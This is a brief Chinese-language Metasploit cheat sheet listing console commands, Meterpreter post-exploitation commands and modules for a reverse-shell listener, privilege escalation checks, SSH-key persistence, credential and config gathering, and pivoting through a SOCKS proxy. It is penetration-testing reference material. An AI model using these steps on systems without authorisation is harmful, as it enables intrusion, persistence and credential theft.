MSF介绍
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
常见指令
use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作
show[exploits/payloads/auxiliary/options] //显示可用特定功能的模块
set[options/payloads] //给某个特定对象赋值
run/exploit //启动,执行已配置好的模块
back //返回上一层
sessions //显示当前所有会话,用use number进入会话
search name //查找metasploit框架中所有的渗透攻击和其他模块。
info //列出模块信息
check //检查目标是否存在该漏洞
入侵后命令
sysinfo //列出被渗透主机的系统信息
ifconfig //列出被渗透主机的网络接口
arp //列出目标主机的arp缓存地址的IP和MAC地址
shell //获取目标主机的一个cmdshell
getuid //获取当前用户细节
getsystem //提升权限,获取系统权限
getpid //获取msf会话在目标主机注入的进程号
ps //列出目标主机所有进程
background //将当前激活的会话放到后台
进阶命令
loadpath exploit //加载外部exploit到当前目录
常用exploit
监听端口模块
use exploit/multi/handler
set paylonad linux/x64/meterpreter/reverse_tcp
检测各种本地提权漏洞
use post/multi/recon/local_exploit_suggester
set session x
ssh权限持久化
use post/linux/manage/sshkey_persistence
收集目标配置文件
use post/linux/gather/enum_configs
收集目标系统相关文件
use post/linux/gather/enum_system
收集应用程序登录凭证
use post/windows/gather/enum_applications
添加路由
use post/multi/manage/autoroute
内网穿透
use auxiliary/server/socks4a
(之后配置从、proxychains联动使其他工具也可以直接使用)